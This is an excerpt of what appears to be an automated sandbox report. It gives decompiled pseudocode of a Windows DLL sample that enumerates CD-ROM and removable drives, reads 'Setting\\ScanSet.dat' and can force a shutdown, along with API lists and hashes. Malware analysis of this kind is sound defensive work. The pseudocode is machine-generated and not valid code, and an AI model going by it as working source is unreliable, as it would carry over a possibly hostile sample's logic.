                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1000FA35(void* __ebp, char _a16, int _a20, signed int _a24, int _a36, int _a40, int _a44, char _a72, char _a76, char _a88, int _a100, char _a204, char _a208, signed int _a232, intOrPtr _a236) {
                                                                                                                				char _v0;
                                                                                                                				CHAR* _t77;
                                                                                                                				long _t78;
                                                                                                                				void* _t83;
                                                                                                                				void* _t88;
                                                                                                                				long _t89;
                                                                                                                				void* _t91;
                                                                                                                				void* _t93;
                                                                                                                				void* _t96;
                                                                                                                				signed int _t97;
                                                                                                                				void* _t99;
                                                                                                                
                                                                                                                				_t89 = GetLogicalDriveStringsA(0, 0);
                                                                                                                				_t1 = _t89 + 1; // 0x1
                                                                                                                				_t77 = E100160EC(_t99, _t1);
                                                                                                                				_t97 = _t96 + 4;
                                                                                                                				_t92 = _t77;
                                                                                                                				_t78 = GetLogicalDriveStringsA(_t89, _t77);
                                                                                                                				_t90 = _t89 + 0xffffffff;
                                                                                                                				_t100 = _t78 - _t89 + 0xffffffff;
                                                                                                                				if(_t78 != _t89 + 0xffffffff) {
                                                                                                                					E1002181C(GetLogicalDriveStringsA, _t90, _t92, _t100, 0x100587a4, 0, 0);
                                                                                                                				} else {
                                                                                                                					__eax = __esi;
                                                                                                                					_t2 = __eax + 1; // 0x1
                                                                                                                					__edx = _t2;
                                                                                                                					do {
                                                                                                                						__cl =  *__eax;
                                                                                                                						__eax = __eax + 1;
                                                                                                                						__eflags = __cl;
                                                                                                                					} while (__cl != 0);
                                                                                                                					__eax = __eax - __edx;
                                                                                                                					__eflags = __eax;
                                                                                                                					__edi = __eax;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__ebx = GetDriveTypeA;
                                                                                                                						do {
                                                                                                                							__eax = GetDriveTypeA(__esi);
                                                                                                                							__eflags = __eax - 5;
                                                                                                                							if(__eax == 5) {
                                                                                                                								__ecx = __esp;
                                                                                                                								_a20 = __esp;
                                                                                                                								__eax = E10005030(__edx, __ebp, __esi);
                                                                                                                								__ecx =  *0x1006f050; // 0x0
                                                                                                                								__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
                                                                                                                							}
                                                                                                                							__esi =  &(__esi[__edi + 1]);
                                                                                                                							__eax = __esi;
                                                                                                                							__edx = __eax + 1;
                                                                                                                							do {
                                                                                                                								__cl =  *__eax;
                                                                                                                								__eax = __eax + 1;
                                                                                                                								__eflags = __cl;
                                                                                                                							} while (__cl != 0);
                                                                                                                							__eax = __eax - __edx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__edi = __eax;
                                                                                                                						} while (__eflags != 0);
                                                                                                                					}
                                                                                                                					__edx =  *0x1006f050; // 0x0
                                                                                                                					__eax =  *(__edx + 0x28c);
                                                                                                                					__edi = 0;
                                                                                                                					__eax = TerminateThread( *(__edx + 0x28c), 0);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__edx =  *(__ecx + 0x20);
                                                                                                                					SendMessageA( *(__ecx + 0x20), 0x111, 0xfff555ee, 0xf55555ee) = E1002181C(__ebx, 0, __esi, __eflags, 0x10058350, 0, 0);
                                                                                                                					__eax =  *0x1006f050; // 0x0
                                                                                                                					 *((intOrPtr*)(__eax + 0x10e8)) = 0;
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					 *((intOrPtr*)(__ecx + 0x10ec)) = 0;
                                                                                                                					__edx =  *0x1006f050; // 0x0
                                                                                                                					 *((intOrPtr*)(__edx + 0x10f0)) = 0;
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D2C4(__ecx, 0x10056948);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D2C4(__ecx, 0x10056948);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D39A(__ecx, 1);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D2C4(__ecx, 0x10056948);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D39A(__ecx, 0);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D39A(__ecx, 0);
                                                                                                                					__ecx =  &_a76;
                                                                                                                					__eax = E100205E2( &_a76, __eflags);
                                                                                                                					_push(0);
                                                                                                                					_push(0x40);
                                                                                                                					_push("Setting\\ScanSet.dat");
                                                                                                                					__ecx =  &_a76;
                                                                                                                					_a208 = 6;
                                                                                                                					__eflags = E10020A24( &_a76, __edx, __eflags);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eax = _a100;
                                                                                                                						__edx =  *(_a100 + 0x28);
                                                                                                                						__ecx =  &_a100;
                                                                                                                						__eax = __edx->i(0, 0, 0);
                                                                                                                						_push(0);
                                                                                                                						_push(0x1000);
                                                                                                                						_push(1);
                                                                                                                						__eax =  &_a88;
                                                                                                                						_push( &_a88);
                                                                                                                						__ecx =  &_a16;
                                                                                                                						__eax = E10020058(__ebx,  &_a16, __edx, 0, __esi, __eflags);
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a204 = 7;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__ecx = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, 0, __esi, __eflags);
                                                                                                                						}
                                                                                                                						__eax = _a40;
                                                                                                                						__ecx = _a44;
                                                                                                                						__edx = __eax + 4;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t36 = __eax + 4; // 0x4
                                                                                                                						__edx = _t36;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t45 = __eax + 4; // 0x4
                                                                                                                						__edx = _t45;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t54 = __eax + 4; // 0x4
                                                                                                                						__edx = _t54;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t63 = __eax + 4; // 0x4
                                                                                                                						__edx = _t63;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__esi =  *__eax;
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__ecx =  &_v0;
                                                                                                                						_a40 = __eax;
                                                                                                                						__eax = E1001FEB3( &_v0, __eflags);
                                                                                                                						__ecx =  &_a72;
                                                                                                                						__eax = E10020580(__ebx,  &_a72);
                                                                                                                						__eflags = __esi - __edi;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = ExitWindowsEx(8, __edi);
                                                                                                                						}
                                                                                                                						__ecx =  &_v0;
                                                                                                                						_a204 = 6;
                                                                                                                						__eax = E1002001A(__ebx,  &_v0, __edx, __edi, __esi, __eflags);
                                                                                                                					}
                                                                                                                					__ecx =  &_a100;
                                                                                                                					_a232 = 0xffffffff;
                                                                                                                					__eax = E100206EF(__ebx, __ecx, __edx, __edi, __esi, __eflags);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] = _a236;
                                                                                                                				_pop(_t91);
                                                                                                                				_pop(_t93);
                                                                                                                				_pop(_t83);
                                                                                                                				return E1003B437(0, _t83, _a232 ^ _t97, _t88, _t91, _t93);
                                                                                                                			}














                                                                                                                0x1000fd04
                                                                                                                0x1000fd08
                                                                                                                0x1000fd0b
                                                                                                                0x1000fd10
                                                                                                                0x1000fd14
                                                                                                                0x1000fd16
                                                                                                                0x1000fd1a
                                                                                                                0x1000fd1b
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd1d
                                                                                                                0x1000fd22
                                                                                                                0x1000fd22
                                                                                                                0x1000fd25
                                                                                                                0x1000fd27
                                                                                                                0x1000fd29
                                                                                                                0x1000fd2b
                                                                                                                0x1000fd2f
                                                                                                                0x1000fd33
                                                                                                                0x1000fd38
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd40
                                                                                                                0x1000fd43
                                                                                                                0x1000fd48
                                                                                                                0x1000fd4c
                                                                                                                0x1000fd4e
                                                                                                                0x1000fd52
                                                                                                                0x1000fd53
                                                                                                                0x1000fd55
                                                                                                                0x1000fd55
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5d
                                                                                                                0x1000fd5f
                                                                                                                0x1000fd61
                                                                                                                0x1000fd63
                                                                                                                0x1000fd67
                                                                                                                0x1000fd6b
                                                                                                                0x1000fd70
                                                                                                                0x1000fd74
                                                                                                                0x1000fd74
                                                                                                                0x1000fd78
                                                                                                                0x1000fd7b
                                                                                                                0x1000fd80
                                                                                                                0x1000fd84
                                                                                                                0x1000fd86
                                                                                                                0x1000fd8a
                                                                                                                0x1000fd8b
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd92
                                                                                                                0x1000fd92
                                                                                                                0x1000fd95
                                                                                                                0x1000fd97
                                                                                                                0x1000fd99
                                                                                                                0x1000fd9b
                                                                                                                0x1000fd9f
                                                                                                                0x1000fda3
                                                                                                                0x1000fda8
                                                                                                                0x1000fda8
                                                                                                                0x1000fdac
                                                                                                                0x1000fdae
                                                                                                                0x1000fdb1
                                                                                                                0x1000fdb5
                                                                                                                0x1000fdb9
                                                                                                                0x1000fdbe
                                                                                                                0x1000fdc2
                                                                                                                0x1000fdc7
                                                                                                                0x1000fdc9
                                                                                                                0x1000fdce
                                                                                                                0x1000fdce
                                                                                                                0x1000fdd4
                                                                                                                0x1000fdd8
                                                                                                                0x1000fde0
                                                                                                                0x1000fde0
                                                                                                                0x1000fde5
                                                                                                                0x1000fde9
                                                                                                                0x1000fdf4
                                                                                                                0x1000fdf4
                                                                                                                0x1000fe02
                                                                                                                0x1000fe0a
                                                                                                                0x1000fe0b
                                                                                                                0x1000fe0d
                                                                                                                0x1000fe22

                                                                                                                APIs
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FA3F
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FA53
                                                                                                                • GetDriveTypeA.KERNEL32(00000000), ref: 1000FA81
                                                                                                                • TerminateThread.KERNEL32(?,00000000,Error in Fun_mycomputer,00000000,00000000), ref: 1000FB6F
                                                                                                                • SendMessageA.USER32 ref: 1000FB8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drive$LogicalStrings$MessageSendTerminateThreadType
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 3133380392-908802073
                                                                                                                • Opcode ID: f002f64c9c675810ec706299cf81ac513a8b1c20879c996d3da3b3c9953051ab
                                                                                                                • Instruction ID: cfe0b056fb03637e9059dfe7cedadf3e8fedbe7a21ee81f138864888d899917b
                                                                                                                • Opcode Fuzzy Hash: f002f64c9c675810ec706299cf81ac513a8b1c20879c996d3da3b3c9953051ab
                                                                                                                • Instruction Fuzzy Hash: 4191C1752083819FE314DB60CD95FABB7E6EF84348F548A1DF6458B292DBB0E905CB12
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1000FAC4(void* __ebp, char _a16, int _a20, signed int _a24, int _a36, int _a40, int _a44, char _a72, char _a76, char _a88, int _a100, char _a204, char _a208, signed int _a232, intOrPtr _a236) {
                                                                                                                				char _v0;
                                                                                                                				CHAR* _t76;
                                                                                                                				long _t77;
                                                                                                                				void* _t82;
                                                                                                                				void* _t88;
                                                                                                                				long _t89;
                                                                                                                				void* _t91;
                                                                                                                				void* _t93;
                                                                                                                				void* _t96;
                                                                                                                				signed int _t97;
                                                                                                                				void* _t99;
                                                                                                                
                                                                                                                				_t89 = GetLogicalDriveStringsA(0, 0);
                                                                                                                				_t1 = _t89 + 1; // 0x1
                                                                                                                				_t76 = E100160EC(_t99, _t1);
                                                                                                                				_t97 = _t96 + 4;
                                                                                                                				_t92 = _t76;
                                                                                                                				_t77 = GetLogicalDriveStringsA(_t89, _t76);
                                                                                                                				_t90 = _t89 + 0xffffffff;
                                                                                                                				_t100 = _t77 - _t89 + 0xffffffff;
                                                                                                                				if(_t77 != _t89 + 0xffffffff) {
                                                                                                                					E1002181C(GetLogicalDriveStringsA, _t90, _t92, _t100, 0x100587a4, 0, 0);
                                                                                                                				} else {
                                                                                                                					__eax = __esi;
                                                                                                                					_t2 = __eax + 1; // 0x1
                                                                                                                					__edx = _t2;
                                                                                                                					do {
                                                                                                                						__cl =  *__eax;
                                                                                                                						__eax = __eax + 1;
                                                                                                                						__eflags = __cl;
                                                                                                                					} while (__cl != 0);
                                                                                                                					__eax = __eax - __edx;
                                                                                                                					__eflags = __eax;
                                                                                                                					__edi = __eax;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__ebx = GetDriveTypeA;
                                                                                                                						do {
                                                                                                                							__eax = GetDriveTypeA(__esi);
                                                                                                                							__eflags = __eax - 2;
                                                                                                                							if(__eax == 2) {
                                                                                                                								__ecx = __esp;
                                                                                                                								_a20 = __esp;
                                                                                                                								__eax = E10005030(__edx, __ebp, __esi);
                                                                                                                								__ecx =  *0x1006f050; // 0x0
                                                                                                                								__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
                                                                                                                							}
                                                                                                                							__esi =  &(__esi[__edi + 1]);
                                                                                                                							__eax = __esi;
                                                                                                                							__edx = __eax + 1;
                                                                                                                							do {
                                                                                                                								__cl =  *__eax;
                                                                                                                								__eax = __eax + 1;
                                                                                                                								__eflags = __cl;
                                                                                                                							} while (__cl != 0);
                                                                                                                							__eax = __eax - __edx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__edi = __eax;
                                                                                                                						} while (__eflags != 0);
                                                                                                                					}
                                                                                                                					__edx =  *0x1006f050; // 0x0
                                                                                                                					__eax =  *(__edx + 0x28c);
                                                                                                                					__edi = 0;
                                                                                                                					__eax = TerminateThread( *(__edx + 0x28c), 0);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__edx =  *(__ecx + 0x20);
                                                                                                                					SendMessageA( *(__ecx + 0x20), 0x111, 0xfff555ee, 0xf55555ee) = E1002181C(__ebx, 0, __esi, __eflags, 0x10058350, 0, 0);
                                                                                                                					__eax =  *0x1006f050; // 0x0
                                                                                                                					 *((intOrPtr*)(__eax + 0x10e8)) = 0;
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					 *((intOrPtr*)(__ecx + 0x10ec)) = 0;
                                                                                                                					__edx =  *0x1006f050; // 0x0
                                                                                                                					 *((intOrPtr*)(__edx + 0x10f0)) = 0;
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D2C4(__ecx, 0x10056948);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D2C4(__ecx, 0x10056948);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D39A(__ecx, 1);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D2C4(__ecx, 0x10056948);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D39A(__ecx, 0);
                                                                                                                					__ecx =  *0x1006f050; // 0x0
                                                                                                                					__eax = E1001D39A(__ecx, 0);
                                                                                                                					__ecx =  &_a76;
                                                                                                                					__eax = E100205E2( &_a76, __eflags);
                                                                                                                					_push(0);
                                                                                                                					_push(0x40);
                                                                                                                					_push("Setting\\ScanSet.dat");
                                                                                                                					__ecx =  &_a76;
                                                                                                                					_a208 = 6;
                                                                                                                					__eflags = E10020A24( &_a76, __edx, __eflags);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eax = _a100;
                                                                                                                						__edx =  *(_a100 + 0x28);
                                                                                                                						__ecx =  &_a100;
                                                                                                                						__eax = __edx->i(0, 0, 0);
                                                                                                                						_push(0);
                                                                                                                						_push(0x1000);
                                                                                                                						_push(1);
                                                                                                                						__eax =  &_a88;
                                                                                                                						_push( &_a88);
                                                                                                                						__ecx =  &_a16;
                                                                                                                						__eax = E10020058(__ebx,  &_a16, __edx, 0, __esi, __eflags);
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a204 = 7;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__ecx = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, 0, __esi, __eflags);
                                                                                                                						}
                                                                                                                						__eax = _a40;
                                                                                                                						__ecx = _a44;
                                                                                                                						__edx = __eax + 4;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t36 = __eax + 4; // 0x4
                                                                                                                						__edx = _t36;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t45 = __eax + 4; // 0x4
                                                                                                                						__edx = _t45;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t54 = __eax + 4; // 0x4
                                                                                                                						__edx = _t54;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__edx > __ecx) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__ecx = _a40;
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__eflags = _a24 & 0x00000001;
                                                                                                                						_a40 = __eax;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = _a20;
                                                                                                                							_push(_a20);
                                                                                                                							_push(4);
                                                                                                                							__eax = E10020287(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                                						}
                                                                                                                						_t63 = __eax + 4; // 0x4
                                                                                                                						__edx = _t63;
                                                                                                                						__eflags = __edx - __ecx;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							__eflags = __eax;
                                                                                                                							__ecx =  &_v0;
                                                                                                                							__eax = E1001FADC( &_v0, __edx, __eax);
                                                                                                                							__eax = _a36;
                                                                                                                						}
                                                                                                                						__esi =  *__eax;
                                                                                                                						__eax = __eax + 4;
                                                                                                                						__ecx =  &_v0;
                                                                                                                						_a40 = __eax;
                                                                                                                						__eax = E1001FEB3( &_v0, __eflags);
                                                                                                                						__ecx =  &_a72;
                                                                                                                						__eax = E10020580(__ebx,  &_a72);
                                                                                                                						__eflags = __esi - __edi;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							__eax = ExitWindowsEx(8, __edi);
                                                                                                                						}
                                                                                                                						__ecx =  &_v0;
                                                                                                                						_a204 = 6;
                                                                                                                						__eax = E1002001A(__ebx,  &_v0, __edx, __edi, __esi, __eflags);
                                                                                                                					}
                                                                                                                					__ecx =  &_a100;
                                                                                                                					_a232 = 0xffffffff;
                                                                                                                					__eax = E100206EF(__ebx, __ecx, __edx, __edi, __esi, __eflags);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] = _a236;
                                                                                                                				_pop(_t91);
                                                                                                                				_pop(_t93);
                                                                                                                				_pop(_t82);
                                                                                                                				return E1003B437(0, _t82, _a232 ^ _t97, _t88, _t91, _t93);
                                                                                                                			}














                                                                                                                0x1000fd22
                                                                                                                0x1000fd22
                                                                                                                0x1000fd25
                                                                                                                0x1000fd27
                                                                                                                0x1000fd29
                                                                                                                0x1000fd2b
                                                                                                                0x1000fd2f
                                                                                                                0x1000fd33
                                                                                                                0x1000fd38
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd3c
                                                                                                                0x1000fd40
                                                                                                                0x1000fd43
                                                                                                                0x1000fd48
                                                                                                                0x1000fd4c
                                                                                                                0x1000fd4e
                                                                                                                0x1000fd52
                                                                                                                0x1000fd53
                                                                                                                0x1000fd55
                                                                                                                0x1000fd55
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5a
                                                                                                                0x1000fd5d
                                                                                                                0x1000fd5f
                                                                                                                0x1000fd61
                                                                                                                0x1000fd63
                                                                                                                0x1000fd67
                                                                                                                0x1000fd6b
                                                                                                                0x1000fd70
                                                                                                                0x1000fd74
                                                                                                                0x1000fd74
                                                                                                                0x1000fd78
                                                                                                                0x1000fd7b
                                                                                                                0x1000fd80
                                                                                                                0x1000fd84
                                                                                                                0x1000fd86
                                                                                                                0x1000fd8a
                                                                                                                0x1000fd8b
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd8d
                                                                                                                0x1000fd92
                                                                                                                0x1000fd92
                                                                                                                0x1000fd95
                                                                                                                0x1000fd97
                                                                                                                0x1000fd99
                                                                                                                0x1000fd9b
                                                                                                                0x1000fd9f
                                                                                                                0x1000fda3
                                                                                                                0x1000fda8
                                                                                                                0x1000fda8
                                                                                                                0x1000fdac
                                                                                                                0x1000fdae
                                                                                                                0x1000fdb1
                                                                                                                0x1000fdb5
                                                                                                                0x1000fdb9
                                                                                                                0x1000fdbe
                                                                                                                0x1000fdc2
                                                                                                                0x1000fdc7
                                                                                                                0x1000fdc9
                                                                                                                0x1000fdce
                                                                                                                0x1000fdce
                                                                                                                0x1000fdd4
                                                                                                                0x1000fdd8
                                                                                                                0x1000fde0
                                                                                                                0x1000fde0
                                                                                                                0x1000fde5
                                                                                                                0x1000fde9
                                                                                                                0x1000fdf4
                                                                                                                0x1000fdf4
                                                                                                                0x1000fe02
                                                                                                                0x1000fe0a
                                                                                                                0x1000fe0b
                                                                                                                0x1000fe0d
                                                                                                                0x1000fe22

                                                                                                                APIs
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FACE
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000FAE2
                                                                                                                • GetDriveTypeA.KERNEL32(00000000), ref: 1000FB11
                                                                                                                • TerminateThread.KERNEL32(?,00000000,Error in Fun_mycomputer,00000000,00000000), ref: 1000FB6F
                                                                                                                • SendMessageA.USER32 ref: 1000FB8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drive$LogicalStrings$MessageSendTerminateThreadType
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 3133380392-908802073
                                                                                                                • Opcode ID: a057d853a7b5793f4b274ae9c00bbc9e93f34406da7524c0c9249602c951c0fd
                                                                                                                • Instruction ID: e432feac7eec440a0e8b97ebd4871b2c47b6a50524a8cf6d2b9a3a90325b327f
                                                                                                                • Opcode Fuzzy Hash: a057d853a7b5793f4b274ae9c00bbc9e93f34406da7524c0c9249602c951c0fd
                                                                                                                • Instruction Fuzzy Hash: 2991BE752083819BE314DB60CD95FABB7E6EF84348F544A1DFA458B292DBB0F905CB12
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1002084E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t38;
                                                                                                                				long _t49;
                                                                                                                				signed int _t50;
                                                                                                                				void* _t52;
                                                                                                                				CHAR* _t56;
                                                                                                                				signed int _t59;
                                                                                                                				void* _t61;
                                                                                                                				int _t65;
                                                                                                                				CHAR* _t74;
                                                                                                                				void* _t75;
                                                                                                                				void* _t76;
                                                                                                                				void* _t89;
                                                                                                                				void* _t90;
                                                                                                                				CHAR* _t92;
                                                                                                                				void* _t93;
                                                                                                                				void* _t96;
                                                                                                                				struct _WIN32_FIND_DATAA* _t98;
